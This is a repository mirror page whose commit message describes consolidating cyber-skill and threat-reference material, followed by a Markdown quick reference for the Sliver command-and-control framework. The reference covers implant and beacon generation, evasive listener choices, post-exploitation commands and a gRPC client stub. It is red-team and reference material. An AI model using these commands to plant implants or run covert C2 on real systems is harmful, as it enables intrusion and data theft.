mirror of
https://github.com/SHOGGOTH-SECTOR/sica-fondt.git
synced 2026-08-01 08:30:20 +00:00
Place useful parts of the surrounding repos into sica-fondt by layer, per the
body model (Ada = membrane; brain/endocrine/capabilities/knowledge non-Ada):
- brain/ LLM reasoning + providers (dapr, hermes, MoMoA)
- capabilities/ REPRAG sidecars: hermes tools/skills, dapr tools, parallel
dispatch, A51 channels, and the OSINT cluster
- knowledge/ LORAG corpus: 754 cyber-skills, agency personas, secure-coding,
MITRE ATT&CK data
- reference/ defensive threat-reference (C3, shhbruh doc) + AdaYaml parser
License handling: AGPL sources (worldosint, advanced_evolution, mercury,
Reticulum) and GPL DeTTECT are SPEC-only clean-room/port descriptions — no
copyleft code copied. MIT/Apache/data parts copied as working trees.
Safety: shhbruh escape/persistence material and C3 covert-C2 kept as reference
only, not wired into the running organism. See CONSOLIDATION.md.
https://claude.ai/code/session_01UehUqEXXJJCsHoA4voCU5c
53 lines
1.6 KiB
Markdown
53 lines
1.6 KiB
Markdown
# API Reference: Sliver C2 Framework
|
|
|
|
## Sliver CLI Commands
|
|
| Command | Description |
|
|
|---------|-------------|
|
|
| `generate --mtls host:port` | Generate session implant |
|
|
| `generate beacon --mtls host:port` | Generate beacon implant |
|
|
| `mtls --lhost IP --lport PORT` | Start mTLS listener |
|
|
| `https --lhost IP --lport PORT` | Start HTTPS listener |
|
|
| `dns --domains domain.com` | Start DNS listener |
|
|
| `sessions` | List active sessions |
|
|
| `beacons` | List active beacons |
|
|
| `use SESSION_ID` | Interact with session |
|
|
|
|
## Generate Options
|
|
| Flag | Description |
|
|
|------|-------------|
|
|
| `--name` | Implant name |
|
|
| `--os` | Target OS (windows/linux/darwin) |
|
|
| `--arch` | Architecture (amd64/386/arm64) |
|
|
| `--format` | exe/shellcode/shared-lib |
|
|
| `--seconds` | Beacon callback interval |
|
|
| `--jitter` | Beacon jitter percentage |
|
|
| `--mtls` | mTLS C2 endpoint |
|
|
| `--https` | HTTPS C2 endpoint |
|
|
| `--dns` | DNS C2 domain |
|
|
|
|
## Listener Types
|
|
| Type | Port | Use Case |
|
|
|------|------|----------|
|
|
| mTLS | 8888 | Encrypted, reliable |
|
|
| HTTPS | 443 | Blends with web traffic |
|
|
| DNS | 53 | Bypasses network filters |
|
|
| WireGuard | 51820 | VPN-based C2 |
|
|
|
|
## Post-Exploitation
|
|
```
|
|
execute-assembly # .NET assembly in memory
|
|
sideload # DLL sideloading
|
|
shell # Interactive shell
|
|
upload/download # File transfer
|
|
portfwd # Port forwarding
|
|
socks5 # SOCKS5 proxy
|
|
```
|
|
|
|
## Sliver gRPC API (Protobuf)
|
|
```python
|
|
import grpc
|
|
from sliverpb import client_pb2_grpc
|
|
channel = grpc.secure_channel("localhost:31337", credentials)
|
|
stub = client_pb2_grpc.SliverRPCStub(channel)
|
|
```
|